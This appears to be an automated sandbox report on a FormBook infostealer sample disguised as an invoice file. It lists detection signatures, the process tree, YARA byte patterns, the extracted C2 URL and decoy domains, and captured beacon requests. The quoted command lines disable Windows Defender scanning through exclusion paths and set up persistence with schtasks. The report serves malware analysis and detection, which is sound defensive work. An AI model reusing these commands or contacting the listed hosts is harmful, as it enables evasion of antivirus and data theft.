
Analysis Report HAWB AND INV.exe

Overview

General Information

Sample Name: HAWB AND INV.exe
Analysis ID: 402848
MD5: 42662765a94ce5ece11529509f937711
SHA1: da57dd4c137c47fc9b906caaf067c6ed13fa2da6
SHA256: 2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HAWB AND INV.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: 42662765A94CE5ECE11529509F937711)
    • powershell.exe (PID: 6932 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7072 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • HAWB AND INV.exe (PID: 6156 cmdline: C:\Users\user\Desktop\HAWB AND INV.exe MD5: 42662765A94CE5ECE11529509F937711)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alldaazz.com/maw9/"], "decoy": ["jaimericart.com", "mayavantcard.com", "romanzava.site", "forefrontunderground.com", "grafikirmarketing.com", "airpoppoff.com", "captureq.com", "vph.ventures", "historiclocation.com", "theoxfordway.com", "springersells.com", "huther.mobi", "networkingmaderas.com", "reggatech.com", "dollfacela.com", "moneycrypt.net", "calidad-precio.net", "hamnsk165.com", "victoriabrownrealtor.com", "itechfreak.com", "bernardocammarata.com", "alfredoarlington.com", "rencontre-montpellier.com", "vipbrandwatch.info", "nhahangminhcuong.com", "senmec23.com", "onemoreusa.com", "dinkoistmatrimony.com", "ideasparatubebe.com", "pozickyauveryinfossk.com", "buildingba.com", "heoslight.com", "ventadecalsotsdevalls.com", "app-cintavcsuges.com", "culturaenmistacones.com", "whyiamvoting.com", "blackopstravel.club", "poorwhitetrashlivesmatters.com", "beachrockisland.com", "natrium-ionen-akkus.com", "noxi.store", "whichrace.com", "mindfulprovision.com", "nznatureguides.com", "fullautoimage.com", "sharonbakcht.com", "ournursingdegreesworld.com", "parismedspas.com", "premier-moment.info", "curvygirlholiday.com", "getsuperyouth.com", "177palmer.com", "headstronghairstudio.com", "sasdrawing.com", "drinkhydrateyourcoffee.com", "globalifier.com", "protocolpolitician.com", "edinglow.com", "isimplix.com", "trendylifefashion.com", "ferhou.com", "ellarewster.club", "ecosanhn.com", "newedulist.com"]}

Yara Overview

Memory Dumps

Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp
  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp
  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 10.2.HAWB AND INV.exe.400000.0.unpack
  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    • 0x158a9:$sqlite3step: 68 34 1C 7B E1
    • 0x159bc:$sqlite3step: 68 34 1C 7B E1
    • 0x158d8:$sqlite3text: 68 38 2A 90 C5
    • 0x159fd:$sqlite3text: 68 38 2A 90 C5
    • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack
  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\HAWB AND INV.exe' , ParentImage: C:\Users\user\Desktop\HAWB AND INV.exe, ParentProcessId: 6752, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', ProcessId: 7072

Signature Overview

AV Detection:

Found malware configuration
Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe, ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
Source: HAWB AND INV.exe, ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match, File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE
Source: 10.2.HAWB AND INV.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: HAWB AND INV.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HAWB AND INV.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\HAWB AND INV.exe, Code function: 4x nop then pop esi, 10_2_00415836
Source: C:\Users\user\Desktop\HAWB AND INV.exe, Code function: 4x nop then pop edi, 10_2_004162B1
Source: C:\Users\user\Desktop\HAWB AND INV.exe, Code function: 4x nop then pop edi, 10_2_00415680
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop esi, 23_2_00125836
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 23_2_001262B1
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 23_2_00125680

          Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.alldaazz.com/maw9/
Source: global traffic, HTTP traffic detected: GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1, Host: www.dinkoistmatrimony.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1, Host: www.premier-moment.info, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1, Host: www.ecosanhn.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1, Host: www.curvygirlholiday.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1, Host: www.networkingmaderas.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, ASN Name: ASDETUKhttpwwwheficedcomGB
Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown, DNS traffic detected: queries for: www.dinkoistmatrimony.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Connection: close, Content-Type: text/html, Transfer-Encoding: chunked, Date: Mon, 03 May 2021 12:53:52 GMT, Server: LiteSpeed
Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp, String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: powershell.exe, 00000002.00000002.526394287.0000000002FEF000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: HAWB AND INV.exe, String found in binary or memory: https://github.com/unguest
Source: HAWB AND INV.exe, String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp, String found in binary or memory: https://go.cpanel.net/privacy
Source: powershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmp, String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmp, String found in binary or memory: https://go.microX%
Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00418260 NtReadFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_004182E0 NtClose
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_004181AA NtCreateFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041825A NtReadFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012199A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012198F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A50 NtCreateFile,LdrInitializeThunk
